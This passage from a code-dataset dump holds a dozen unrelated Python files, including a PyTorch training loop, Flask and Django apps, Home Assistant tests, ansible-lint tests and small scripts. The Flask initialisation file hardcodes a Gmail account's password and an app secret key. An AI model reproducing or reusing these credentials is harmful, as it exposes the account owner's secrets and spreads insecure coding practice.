\"{}\"\\nepoch = {}, test loss = {}\\n'.format(MODEL_SAVE_PATH, SAVED_MODEL['epoch'], SAVED_MODEL['loss_test']))\n else:\n SAVED_MODEL = {'loss_test':None, 'epoch':0}\n print('no best model found at \"{}\"\\n'.format(MODEL_SAVE_PATH))\n\n\n ## Training loop :\n for i in tqdm(range(SAVED_MODEL['epoch'], N), desc='epochs'):\n ## test network :\n if i%test_freq==0 or i%save_model_freq==0:\n loss_test = validation_regress(net, test_dataloader, loss_func)\n writer.add_scalars('loss', {'test': loss_test}, i)\n writer.flush()\n ## save best model :\n if i%save_model_freq==0 and (not ONLY_SAVE_BEST_MODEL or SAVED_MODEL['loss_test'] is None or SAVED_MODEL['loss_test']>loss_test):\n SAVED_MODEL['epoch'] = i\n SAVED_MODEL['loss_test'] = loss_test\n SAVED_MODEL['params'] = net.state_dict()\n SAVED_MODEL['optimizer'] = optimizer.state_dict()\n with open(MODEL_SAVE_PATH, 'wb') as f:\n pkl.dump(SAVED_MODEL, f)\n SAVED_MODEL['params'] = None # useless to keep the weights in memory\n print('\\nepoch {} : new model saved\\n'.format(i))\n\n ## train (one epoch) :\n optimizer.zero_grad()\n loss_train = 0.\n num_batchs = 0.\n for x, y_target in tqdm(train_dataloader, desc='train'):\n y = net(x)\n loss = loss_func(y, y_target)\n loss.backward()\n optimizer.step()\n loss_train += loss.item()\n num_batchs += 1\n\n if i%loss_freq==0:\n loss_train /= num_batchs\n writer.add_scalars('loss', {'train': loss_train}, i)\n\n if i%histogram_freq==0:\n ## On enregistre les gradients à différentes couches pour constater si ils se propagent bien ou non :\n writer.add_histogram('weights/fi', net.rnn.fi.weight, i)\n writer.add_histogram('weights/fh', net.rnn.fh.weight, i)\n writer.add_histogram( 'grads/fi', net.rnn.fi.weight.grad, i)\n writer.add_histogram( 'grads/fh', net.rnn.fh.weight.grad, i)\n writer.add_histogram('outputs', y, i)\n\n writer.close()\n","sub_path":"code_guetschel/AMAL_tp4_forecasting.py","file_name":"AMAL_tp4_forecasting.py","file_ext":"py","file_size_in_byte":6111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"182507532","text":"\n\n#Runtime: 76 ms, faster than 28.95% of Python3 online submissions for ZigZag Conversion.\n#Memory Usage: 14.4 MB, less than 45.55% of Python3 online submissions for ZigZag Conversion.\n\n# Time Constant: O(n+k) where n = number of characters in the string and k is the number of rows. However, since k < n, therefore O(n+k < n+n) that is O(n+k < 2n).\n# Therefore, Time Constant: O(n)\n# Space Constant: O(n)\n\ndef solution1(s, numRows):\n '''\n 1. Base case: If the numRows mentioned is 1, that means there is just one row, which will be the string itself. Also, if the numRows >= the string, then each row will just have 1 character, and since each row is appended to each other, it will print out the string as well.\n 2. Let us consider each row to be a list. So basically, PAYPALISHIRING with numRows = 3 would become:\n [PAHN]\n [APLSIIG]\n [YIR]\n 3. We would be traversing the string and insert each character from the 0th list to the nth list.\n 4. Once we reach the nth list, we must now traverse back to list 0. Starting from list n-1 we must put one character into each list.\n 5. Now we will be having numRows rows filled with characters. We must traverse every row from first to last, and append each row to the previour row.\n '''\n\n #1. Base case: If the numRows mentioned is 1, that means there is just one row, which will be the string itself. Also, if the numRows >= the string, then each row will just have 1 character, and since each row is appended to each other, it will print out the string as well.\n if numRows == 1 or numRows >= len(s):\n return s\n #2. Create a list for each row given\n row = [[] for i in range(numRows)]\n #store the count of which row we are on so that we can append that row with a character\n rowCount = 0\n #flag indicates whether we are travelling down from 0 to n or up from n-1 to 0.\n flag = 1\n #3. We would be traversing the string and insert each character from the 0th list to the nth list.\n for character in s:\n row[rowCount].append(character)\n rowCount += flag\n #4. Once we reach the end of the row list (either start of the list or the end) we must now reverse our path and go to the opposite direction. \n if rowCount == 0 or rowCount == numRows-1:\n flag *= -1\n \n #5. We now have numRows rows filled with characters. We must convert each row into a string and append the string to the previous row\n for i in range(len(row)):\n row[i] = ''.join(row[i])\n return ''.join(row)\n","sub_path":"Medium/6. ZigZag Conversion/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":2535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"416359069","text":"from datetime import datetime, timedelta\nimport random\n\nfrom django.core.management.base import BaseCommand\nfrom django.db import IntegrityError\n\nfrom pm.models import Offer, Deal\n\n\nclass Command(BaseCommand):\n\n def handle(self, *args, **options):\n # get offers\n offers = Offer.objects.all()\n for offer in offers:\n\n # create deal\n sr = random.choice(range(-20, 100))\n start = datetime.now() - timedelta(days=sr)\n sr = random.choice(range(-20, 100))\n stop = datetime.now() + timedelta(days=sr)\n if stop < start:\n start, stop = stop, start\n deal = Deal(\n title=offer.name,\n customer_chooses=bool(len(offer.products.all()) > 1),\n starts_on=start,\n ends_on=stop,\n initial_position=random.choice(range(1, 100)),\n current_position=random.choice(range(1, 100))\n )\n try:\n deal.save()\n self.stdout.write('created deal: %s' % str(deal))\n except IntegrityError as e:\n self.stderr.write(str(e))\n continue\n\n # attach offer to deal\n deal.offers.add(offer)\n self.stdout.write('attached offer: %s' % str(offer))\n","sub_path":"pm/management/commands/mass-produce-deals.py","file_name":"mass-produce-deals.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"578323376","text":"import csv\n\n# 문자열(string)을 아이템으로 갖는 리스트\nrow1 = ['test1', 'success', 'Mon']\nrow2 = ['test2', 'failure, kind of', 'Tue']\nrow3 = ['test3', 'success, kind of', 'Wed']\nresult = [row1, row2, row3]\nprint(result)\n\n# 파일을 쓰기 모드로 열기\n# csv 파일을 쓸(write) 때는 불필요한 라인이 쓰이지 않도록 하기 위해 오픈 시 newline='' 파라미터를 추가\nwith open('test_result.csv', mode='w', encoding='UTF-8', newline='') as f:\n # csv writer 객체 생성\n writer = csv.writer(f, delimiter=',')\n for row in result:\n # writer 객채의 writerow() 메소드를 이용해서 한줄씩 쓰기\n writer.writerow(row)\n\n# csv 모듈을 사용하지 않고 csv 파일을 읽었을 때 문제점\nwith open('test_result.csv', mode='r', encoding='UTF-8') as f:\n for line in f:\n print(line.strip().split(','))\n # 'failure, kind of'라는 하나의 문자열이\n # 'failure'와 'kind of'라는 두 개의 문자열로 조개짐\n # 원래 데이터에 없어야 할 ''가 문자열에 포함됨\n\nprint('\\ncsv 모듈을 사용할 때')\nwith open('test_result.csv', mode='r', encoding='UTF-8') as f:\n # csv reader 객체를 생성\n reader = csv.reader(f)\n for row in reader:\n # reader 객체의 read 기능을 이용해서 한줄씩 읽음\n print(row)\n","sub_path":"scratch09/ex01.py","file_name":"ex01.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"460506100","text":"#MUSKAN BAGRECHA\r\nimport random\r\ndef rps():\r\n L = [\"rock\", \"paper\", \"scissors\"]\r\n ctrcomp=0\r\n ctrplayer=0\r\n while True:\r\n a=int(input(\"Do you want to play? Type 1 for yes, 0 for no\"))\r\n if a==0:\r\n print(\"THANK YOU\")\r\n print(\"Scorecard is as follows: You={} and computer={}\".format(ctrplayer, ctrcomp))\r\n if ctrcomp==ctrplayer:\r\n print(\"It's a tie\")\r\n elif ctrcomp>ctrplayer:\r\n print(\"Uh-oh! You lose. Better luck next time :)\")\r\n else:\r\n print(\"Congratulations!! You won\")\r\n break\r\n else:\r\n choice = input(\"rock, paper or scissors?\")\r\n opponent=random.choice(L)\r\n print(\"Computer: \", opponent)\r\n if choice == opponent:\r\n print(\"Tie\")\r\n elif (choice==\"rock\" and opponent=='paper') or (choice=='paper' and opponent=='scissors') or (choice=='scissors' and opponent=='rock'):\r\n print(\"Computer gets the point\")\r\n ctrcomp+=1\r\n else:\r\n print(\"You get the point\")\r\n ctrplayer+=1\r\n \r\n#MAIN\r\nrps()\r\n","sub_path":"ROCKPAPERSCISSORS.py","file_name":"ROCKPAPERSCISSORS.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"104319724","text":"## set up of our db file\n\nimport os\nfrom flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_migrate import Migrate\nfrom flask_login import LoginManager\nfrom flask_cors import CORS\nfrom flask_mail import Mail,Message\nfrom flask_admin import Admin\n\n\n\nlogin_manager=LoginManager()\n\napp=Flask(__name__)\n\n# admin=Admin(app)\nlogin=LoginManager(app)\napp.config['MAIL_SERVER'] = 'smtp.gmail.com'\napp.config['MAIL_PORT'] = 587\napp.config['MAIL_USE_TLS'] = True\napp.config['MAIL_USERNAME'] = 'fypmailing@gmail.com'\napp.config['MAIL_PASSWORD'] = 'project2019'\napp.config['SECRET_KEY'] = 'mysecretkey'\n\nmail = Mail(app)\n\n\n\nAPP_ROOT = os.path.dirname(os.path.abspath(__file__))\n\nPROFILE_FOLDER = os.path.join(APP_ROOT,'profilephotos')\nUPLOAD_FOLDER = os.path.join(APP_ROOT,'uploads') \nEXCEL_FOLDER = os.path.join(APP_ROOT,'exports')\n\napp.config['PROFILE_FOLDER'] = PROFILE_FOLDER\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\napp.config['EXCEL_FOLDER'] = EXCEL_FOLDER\n\n\n\nCORS(app)\n\n################# SQL DATABASE SECTION ##########\n\nbasedir = os.path.abspath(os.path.dirname(__file__))\n\napp.config['SQLALCHEMY_DATABASE_URI'] ='sqlite:///'+os.path.join(basedir,'data.sqlite')\n\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] =False\n\ndb = SQLAlchemy(app)\n\nMigrate(app,db)\n\nlogin_manager.init_app(app)\n\nlogin_manager.login_view ='login'\n","sub_path":"back-end/project/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"396809692","text":"from flask import render_template, flash, redirect, url_for\n\n\nfrom .forms import ProductForm\nfrom app import db\nfrom app.models import Product\n\nfrom . import products\n\n@products.route('/', methods=['GET', 'POST'])\ndef list_products():\n\n prods = Product.query.all()\n\n return render_template('products/index.html',\n prods=prods, title=\"Products\")\n\n\n@products.route('/add', methods=['GET', 'POST'])\ndef add_product():\n add_product = True\n\n form = ProductForm()\n if form.validate_on_submit():\n product = Product(name=form.name.data,\n description=form.description.data)\n try:\n # add product to the database\n db.session.add(product)\n db.session.commit()\n except:\n # in case product name already exists\n flash('Error: product name already exists.')\n\n # redirect to products page\n return redirect(url_for('products.list_products'))\n\n # load product template\n return render_template('products/product.html', action=\"Add\",\n add_product=add_product, form=form,\n title=\"Add Product\")\n\n\n@products.route('/edit/', methods=['GET', 'POST'])\ndef edit_product(id):\n add_product = False\n\n product = Product.query.get_or_404(id)\n form = ProductForm(obj=product)\n if form.validate_on_submit():\n product.name = form.name.data\n product.description = form.description.data\n db.session.commit()\n flash('You have successfully edited the product.')\n\n # redirect to the departments page\n return redirect(url_for('products.list_products'))\n\n form.description.data = product.description\n form.name.data = product.name\n return render_template('products/product.html', action=\"Edit\",\n add_department=add_product, form=form,\n product=product, title=\"Edit Product\")\n\n\n@products.route('/delete/', methods=['GET', 'POST'])\ndef delete_product(id):\n product = Product.query.get_or_404(id)\n db.session.delete(product)\n db.session.commit()\n flash('You have successfully deleted the product.')\n\n # redirect to the products page\n return redirect(url_for('products.list_products'))\n\n return render_template(title=\"Delete Product\")","sub_path":"app/controllers/products/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"610014113","text":"##Builds Fermentor Graphical Plugin\nimport os, sys, string\nimport SConsAddons.Util as sca_util\nimport distutils.util\npj = os.path.join\n\nhost_type = distutils.util.get_platform()\n\nImport( 'baseEnv ves_pkg buildDir RootDir osgworks_options gmtl_options vrjuggler_options osg_options osgal_options xerces_options vtk_options GetPlatform' )\nImport('switchwire_options poco_options')\n\nopenDir = os.path.abspath( pj( RootDir, 'share', 'examples', 'input_animation', 'animationGP' ) )\nsources = sca_util.getSourcesRecursive( openDir )\nheaders = sca_util.getHeadersRecursive( openDir )\n\nlib_env = ves_pkg.getEnv().Clone()\nlib_env.Append( LIBS = [ 'ves_open_xml',\n 'ves_xplorer',\n 'ves_xplorer_scenegraph' ] )\nlib_env.Append( LIBPATH = [ pj( '#', buildDir, 'src', 'ves', 'open', 'xml' ),\n pj( '#', buildDir, 'src', 'ves', 'xplorer' ),\n pj( '#', buildDir, 'src', 'ves', 'xplorer', 'scenegraph' ) ] )\nlib_env.Append( CPPDEFINES = [ 'VE_USER_PLUGIN_LIBRARY' ] )\nif GetPlatform() == 'win32':\n lib_env['no_import_lib'] = 1\n #lib_env['SHLINKFLAGS'] = '$LINKFLAGS /dll /MANIFEST:NO'\n lib_env['WINDOWS_INSERT_MANIFEST'] = False\n\ngmtl_options.apply( lib_env )\nvrjuggler_options.apply( lib_env )\nosg_options.apply( lib_env )\nif osgal_options.isAvailable():\n osgal_options.apply( lib_env )\n lib_env.Append( CPPDEFINES = [ 'VE_SOUND' ] )\nxerces_options.apply( lib_env )\nvtk_options.apply( lib_env )\nosgworks_options.apply( lib_env )\nswitchwire_options.apply( lib_env )\npoco_options.apply( lib_env )\n\nlib = ves_pkg.createLoadableModule( 'VEAnimationGraphicalPlugin', lib_env,\n installPrefix = pj( 'share', 'vesuite', 'examples', 'input_animation', 'Plugins', 'GE', host_type ) ) \n\nlib.addSources( sources )\nlib.build()\n","sub_path":"share/examples/input_animation/animationGP/SConscript","file_name":"SConscript","file_ext":"","file_size_in_byte":1812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"395152877","text":"\"\"\"Tests for the switch entity.\"\"\"\r\nfrom unittest import IsolatedAsyncioTestCase\r\nfrom unittest.mock import AsyncMock, patch\r\n\r\nfrom homeassistant.components.switch import DEVICE_CLASS_OUTLET\r\nfrom homeassistant.const import STATE_UNAVAILABLE\r\n\r\nfrom custom_components.tuya_local.generic.switch import TuyaLocalSwitch\r\nfrom custom_components.tuya_local.helpers.device_config import TuyaDeviceConfig\r\n\r\nfrom ..const import KOGAN_SOCKET_PAYLOAD\r\nfrom ..helpers import assert_device_properties_set\r\n\r\nSWITCH_DPS = \"1\"\r\nTIMER_DPS = \"2\"\r\nCURRENT_DPS = \"4\"\r\nPOWER_DPS = \"5\"\r\nVOLTAGE_DPS = \"6\"\r\n\r\n\r\nclass TestKoganSwitch(IsolatedAsyncioTestCase):\r\n def setUp(self):\r\n device_patcher = patch(\"custom_components.tuya_local.device.TuyaLocalDevice\")\r\n self.addCleanup(device_patcher.stop)\r\n self.mock_device = device_patcher.start()\r\n cfg = TuyaDeviceConfig(\"kogan_switch.yaml\")\r\n switch = cfg.primary_entity\r\n self.switch_name = switch.name\r\n self.subject = TuyaLocalSwitch(self.mock_device(), switch)\r\n self.dps = KOGAN_SOCKET_PAYLOAD.copy()\r\n\r\n self.subject._device.get_property.side_effect = lambda id: self.dps[id]\r\n\r\n def test_should_poll(self):\r\n self.assertTrue(self.subject.should_poll)\r\n\r\n def test_name_returns_device_name(self):\r\n self.assertEqual(self.subject.name, self.subject._device.name)\r\n\r\n def test_friendly_name_returns_config_name(self):\r\n self.assertEqual(self.subject.friendly_name, self.switch_name)\r\n\r\n def test_unique_id_returns_device_unique_id(self):\r\n self.assertEqual(self.subject.unique_id, self.subject._device.unique_id)\r\n\r\n def test_device_info_returns_device_info_from_device(self):\r\n self.assertEqual(self.subject.device_info, self.subject._device.device_info)\r\n\r\n def test_device_class_is_outlet(self):\r\n self.assertEqual(self.subject.device_class, DEVICE_CLASS_OUTLET)\r\n\r\n def test_is_on(self):\r\n self.dps[SWITCH_DPS] - True\r\n self.assertTrue(self.subject.is_on)\r\n\r\n self.dps[SWITCH_DPS] = False\r\n self.assertFalse(self.subject.is_on)\r\n\r\n def test_is_on_when_unavailable(self):\r\n self.dps[SWITCH_DPS] = None\r\n self.assertEqual(self.subject.is_on, STATE_UNAVAILABLE)\r\n\r\n async def test_turn_on(self):\r\n async with assert_device_properties_set(\r\n self.subject._device, {SWITCH_DPS: True}\r\n ):\r\n await self.subject.async_turn_on()\r\n\r\n async def test_turn_off(self):\r\n async with assert_device_properties_set(\r\n self.subject._device, {SWITCH_DPS: False}\r\n ):\r\n await self.subject.async_turn_off()\r\n\r\n async def test_toggle_turns_the_switch_on_when_it_was_off(self):\r\n self.dps[SWITCH_DPS] = False\r\n\r\n async with assert_device_properties_set(\r\n self.subject._device, {SWITCH_DPS: True}\r\n ):\r\n await self.subject.async_toggle()\r\n\r\n async def test_toggle_turns_the_switch_off_when_it_was_on(self):\r\n self.dps[SWITCH_DPS] = True\r\n\r\n async with assert_device_properties_set(\r\n self.subject._device, {SWITCH_DPS: False}\r\n ):\r\n await self.subject.async_toggle()\r\n\r\n def test_current_power_w(self):\r\n self.dps[POWER_DPS] = 1234\r\n self.assertEqual(self.subject.current_power_w, 123.4)\r\n\r\n def test_device_state_attributes_set(self):\r\n self.dps[TIMER_DPS] = 1\r\n self.dps[VOLTAGE_DPS] = 2350\r\n self.dps[CURRENT_DPS] = 1234\r\n self.dps[POWER_DPS] = 5678\r\n self.assertCountEqual(\r\n self.subject.device_state_attributes,\r\n {\r\n \"timer\": 1,\r\n \"current_a\": 1.234,\r\n \"voltage_v\": 235.0,\r\n \"current_power_w\": 567.8,\r\n },\r\n )\r\n\r\n self.dps[TIMER_DPS] = 0\r\n self.dps[CURRENT_DPS] = None\r\n self.dps[VOLTAGE_DPS] = None\r\n self.dps[POWER_DPS] = None\r\n self.assertCountEqual(\r\n self.subject.device_state_attributes,\r\n {\r\n \"timer\": 0,\r\n \"current_a\": None,\r\n \"voltage_v\": None,\r\n \"current_power_w\": None,\r\n },\r\n )\r\n\r\n async def test_update(self):\r\n result = AsyncMock()\r\n self.subject._device.async_refresh.return_value = result()\r\n\r\n await self.subject.async_update()\r\n\r\n self.subject._device.async_refresh.assert_called_once()\r\n result.assert_awaited()\r\n","sub_path":"tests/devices/test_kogan_switch.py","file_name":"test_kogan_switch.py","file_ext":"py","file_size_in_byte":4523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"461060894","text":"import serial\nimport time\nimport sys\nimport sqlite3\nimport os.path\nimport re\n\nser = serial.Serial('/dev/ttyUSB0', 9600) # set up for serial read\ntime.sleep(2)\n\ncounter = 0\nwhile 1: # repeatedly parse for incoming data\n connection = sqlite3.connect('xbee.db') # connect to local db\n db = connection.cursor()\n data = ''\n curr_e = time.localtime()\n curr_t = int(time.strftime(\"%H%M%S\", curr_e)) #timestamp\n data = ser.readline() # reading data from router\n data = data.decode().strip('\\r\\n')\n if data.find('PPM') >= 0: # airquality data\n aq = int(data[0]) * 10 + int(data[1])\n else: # mac address data\n dev = int(data[0]) * 10 + int(data[1])\n if counter % 2 == 0 and counter != 0:\n print(curr_e)\n db.execute(\"INSERT INTO sensordata(devices, airquality, time) VALUES({},{},{})\".format(dev,aq,curr_t)) # write to DB\n\n connection.commit()\n connection.close()\n counter += 1\n","sub_path":"web_server/serial_read.py","file_name":"serial_read.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"62107583","text":"import datetime\nimport os\nimport sys\n\nfrom send2trash import send2trash\nfrom setproctitle import setproctitle\n\n\ndef remove_folders(path, removeRoot=True):\n \"\"\"Removes empty folders\"\"\"\n if not os.path.isdir(path):\n return\n\n # remove empty subfolders\n files = os.listdir(path)\n if len(files):\n for f in files:\n fullpath = os.path.join(path, f)\n if os.path.isdir(fullpath):\n remove_folders(fullpath)\n\n # if folder empty, delete it\n files = os.listdir(path)\n if len(files) == 0 and removeRoot:\n print(\"Removing empty folder:\", path)\n os.rmdir(path)\n\n\ndef main():\n setproctitle('Directory Cleaner')\n\n dir_to_search = sys.argv[1]\n for dirpath, dirnames, filenames in os.walk(dir_to_search):\n for file in filenames:\n curpath = os.path.join(dirpath, file)\n file_modified = datetime.datetime.fromtimestamp(\n os.path.getmtime(curpath))\n if datetime.datetime.now() - file_modified > datetime.timedelta(\n hours=72):\n # os.remove(curpath)\n send2trash(curpath)\n\n remove_folders(dir_to_search, False)\n","sub_path":"directory_cleaner/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"605162973","text":"from __future__ import absolute_import, unicode_literals\nfrom string import Template as str_Template\n\nfrom celery import shared_task\n\nfrom django.core.mail import send_mail\n\n@shared_task\ndef chat_mail_note(username, chat_name, target_mail):\n send_mail(\n 'You created a new chat',\n str_Template(\n 'Hello $username,\\n\\n you have created a new chat named $chat'\n ).substitute(username=username, chat=chat_name),\n 'from@no.one',\n [target_mail]\n )\n\n","sub_path":"messanger/chats/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"237214825","text":"from PhysicsTools.Heppy.analyzers.core.Analyzer import Analyzer\nfrom PhysicsTools.Heppy.analyzers.core.AutoHandle import AutoHandle\n\nclass ttHFastLepSkimmer( Analyzer ):\n def __init__(self, cfg_ana, cfg_comp, looperName ):\n super(ttHFastLepSkimmer,self).__init__(cfg_ana,cfg_comp,looperName)\n self.muIdCut = self.cfg_ana.muCut\n self.eleIdCut = self.cfg_ana.eleCut\n\n def declareHandles(self):\n super(ttHFastLepSkimmer, self).declareHandles()\n self.handles['muons'] = AutoHandle(self.cfg_ana.muons,\"std::vector\") \n self.handles['electrons'] = AutoHandle(self.cfg_ana.electrons,\"std::vector\") \n\n def beginLoop(self, setup):\n super(ttHFastLepSkimmer,self).beginLoop(setup)\n self.counters.addCounter('events')\n self.count = self.counters.counter('events')\n self.count.register('all events')\n self.count.register('accepted events')\n\n\n def process(self, event):\n self.readCollections( event.input )\n self.count.inc('all events')\n \n leptons = 0\n\n for el in self.handles['electrons'].product():\n if self.eleIdCut(el): leptons += 1\n\n for mu in self.handles['muons'].product():\n if self.muIdCut(mu): leptons += 1\n\n if leptons >= self.cfg_ana.minLeptons:\n self.count.inc('accepted events')\n return True\n\n return False\n","sub_path":"TTHAnalysis/python/analyzers/ttHFastLepSkimmer.py","file_name":"ttHFastLepSkimmer.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"182931202","text":"# -*- coding: utf-8 -*-\n# Author: Adrián Tóth \n#\n# Copyright (c) 2020, Red Hat, Inc.\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\nfrom collections import namedtuple\n\nimport pytest\n\nfrom ansiblelint.runner import Runner\n\nPlayFile = namedtuple('PlayFile', ['name', 'content'])\n\n\nFAIL_TASK_1LN = PlayFile('playbook.yml', '''\n- hosts: all\n tasks:\n - name: one-level nesting\n set_fact:\n var_one: \"2*(1+2) is {{ 2 * {{ 1 + 2 }} }}\"\n''')\n\nFAIL_TASK_1LN_M = PlayFile('playbook.yml', '''\n- hosts: all\n tasks:\n - name: one-level multiline nesting\n set_fact:\n var_one_ml: >\n 2*(1+2) is {{ 2 *\n {{ 1 + 2 }}\n }}\n''')\n\nFAIL_TASK_2LN = PlayFile('playbook.yml', '''\n- hosts: all\n tasks:\n - name: two-level nesting\n set_fact:\n var_two: \"2*(1+(3-1)) is {{ 2 * {{ 1 + {{ 3 - 1 }} }} }}\"\n''')\n\nFAIL_TASK_2LN_M = PlayFile('playbook.yml', '''\n- hosts: all\n tasks:\n - name: two-level multiline nesting\n set_fact:\n var_two_ml: >\n 2*(1+(3-1)) is {{ 2 *\n {{ 1 +\n {{ 3 - 1 }}\n }} }}\n''')\n\nFAIL_TASK_W_5LN = PlayFile('playbook.yml', '''\n- hosts: all\n tasks:\n - name: five-level wild nesting\n set_fact:\n var_three_wld: \"{{ {{ {{ {{ {{ 234 }} }} }} }} }}\"\n''')\n\nFAIL_TASK_W_5LN_M = PlayFile('playbook.yml', '''\n- hosts: all\n tasks:\n - name: five-level wild multiline nesting\n set_fact:\n var_three_wld_ml: >\n {{\n {{\n {{\n {{\n {{ 234 }}\n }}\n }}\n }}\n }}\n''')\n\nSUCCESS_TASK_P = PlayFile('playbook.yml', '''\n- hosts: all\n tasks:\n - name: non-nested example\n set_fact:\n var_one: \"number for 'one' is {{ 2 * 1 }}\"\n''')\n\nSUCCESS_TASK_P_M = PlayFile('playbook.yml', '''\n- hosts: all\n tasks:\n - name: multiline non-nested example\n set_fact:\n var_one_ml: >\n number for 'one' is {{\n 2 * 1 }}\n''')\n\nSUCCESS_TASK_2P = PlayFile('playbook.yml', '''\n- hosts: all\n tasks:\n - name: nesting far from each other\n set_fact:\n var_two: \"number for 'two' is {{ 2 * 1 }} and number for 'three' is {{ 4 - 1 }}\"\n''')\n\nSUCCESS_TASK_2P_M = PlayFile('playbook.yml', '''\n- hosts: all\n tasks:\n - name: multiline nesting far from each other\n set_fact:\n var_two_ml: >\n number for 'two' is {{ 2 * 1\n }} and number for 'three' is {{\n 4 - 1 }}\n''')\n\nSUCCESS_TASK_C_2P = PlayFile('playbook.yml', '''\n- hosts: all\n tasks:\n - name: nesting close to each other\n set_fact:\n var_three: \"number for 'ten' is {{ 2 - 1 }}{{ 3 - 3 }}\"\n''')\n\nSUCCESS_TASK_C_2P_M = PlayFile('playbook.yml', '''\n- hosts: all\n tasks:\n - name: multiline nesting close to each other\n set_fact:\n var_three_ml: >\n number for 'ten' is {{\n 2 - 1\n }}{{ 3 - 3 }}\n''')\n\n\n@pytest.fixture\ndef runner(tmp_path, default_rules_collection):\n return Runner(\n default_rules_collection,\n str(tmp_path / 'playbook.yml'),\n [], [], [],\n )\n\n\n@pytest.fixture\ndef _playbook_file(tmp_path, request):\n if request.param is None:\n return\n for play_file in request.param:\n p = tmp_path / play_file.name\n p.write_text(play_file.content)\n\n\n@pytest.mark.parametrize(\n '_playbook_file',\n (\n pytest.param([FAIL_TASK_1LN], id='file includes one-level nesting'),\n pytest.param([FAIL_TASK_1LN_M], id='file includes one-level multiline nesting'),\n pytest.param([FAIL_TASK_2LN], id='file includes two-level nesting'),\n pytest.param([FAIL_TASK_2LN_M], id='file includes two-level multiline nesting'),\n pytest.param([FAIL_TASK_W_5LN], id='file includes five-level wild nesting'),\n pytest.param([FAIL_TASK_W_5LN_M], id='file includes five-level wild multiline nesting'),\n ),\n indirect=['_playbook_file'],\n)\n@pytest.mark.usefixtures('_playbook_file')\ndef test_including_wrong_nested_jinja(runner):\n rule_violations = runner.run()\n assert rule_violations[0].rule.id == '207'\n\n\n@pytest.mark.parametrize(\n '_playbook_file',\n (\n pytest.param([SUCCESS_TASK_P], id='file includes non-nested example'),\n pytest.param([SUCCESS_TASK_P_M], id='file includes multiline non-nested example'),\n pytest.param([SUCCESS_TASK_2P], id='file includes nesting far from each other'),\n pytest.param([SUCCESS_TASK_2P_M], id='file includes multiline nesting far from each other'),\n pytest.param([SUCCESS_TASK_C_2P], id='file includes nesting close to each other'),\n pytest.param(\n [SUCCESS_TASK_C_2P_M],\n id='file includes multiline nesting close to each other',\n ),\n ),\n indirect=['_playbook_file'],\n)\n@pytest.mark.usefixtures('_playbook_file')\ndef test_including_proper_nested_jinja(runner):\n rule_violations = runner.run()\n assert not rule_violations\n","sub_path":"test/TestNestedJinjaRule.py","file_name":"TestNestedJinjaRule.py","file_ext":"py","file_size_in_byte":5931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"82064193","text":"#!/usr/bin/env python\n# Parse input report\n# Input file is a report from http://cello.life.nctu.edu.tw\n\n# Select all GIs from Extracellular records\n# \n# Build a FASTA record of all Mouse Proteins with those GIs\n\nfrom Bio import SeqIO\n\n#input_file_name = \"sample-input.txt\"\ninput_file_name = \"full-input.txt\" # Real input\n\n# Store all mouse protein records in a Dict indexed on gi number\nmice = {}\nfor seq_record in SeqIO.parse(\"mouse.fasta\", \"fasta\"):\n\t\tmice[seq_record.id.split('|')[1]] = seq_record\n\noutfile = open(\"output.fasta\",\"w\")\n\nwith open(input_file_name, \"r\") as infile:\n\tfor line in infile:\n\t\tif line.startswith(\"SeqID\"):\n\t\t\t# new record, store its GI number, but only keep if it's \"Extracellular\"\n\t\t\tgi = line.split('|')[1]\n\t\telse:\n\t\t\t# lines we want look like this:\n\t\t\t# \t Extracellular\t 2.632 